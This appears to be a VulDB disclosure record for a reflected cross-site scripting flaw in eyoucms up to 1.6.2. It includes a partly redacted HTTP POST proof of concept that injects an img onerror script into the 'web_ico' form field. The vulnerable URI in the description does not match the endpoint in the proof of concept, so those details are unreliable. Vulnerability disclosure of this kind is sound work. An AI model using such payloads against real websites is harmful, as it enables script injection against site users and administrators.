| Field | Value |
|---|---|
| Title | eyoucms up to 1.6.2 'web_ico' reflected XSS vulnerability |
| Description | eyoucms up to 1.6.2 has an XSS vulnerability. The vulnerable URI is `/yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4` and the vulnerable multipart parameter is `name="web_ico"`. POC below. See details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md |
| Source | https://www.eyoucms.com/ |
| User | WWesleywww (UID 43117) |
| Submission | 04/07/2023 15:36 (3 years ago) |
| Moderation | 04/14/2023 10:36 (7 days later) |
| Status | Accepted |
| VulDB entry | 225943 [EyouCms up to 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico cross site scripting] |
| Points | 17 |

POC:

```http
POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1
*****************************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
Content-Disposition: form-data; name="web_ico"
<img src=1 onerror=alert(8)>
------WebKitFormBoundaryq3khRwDr0dBifJAy
**********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy--
```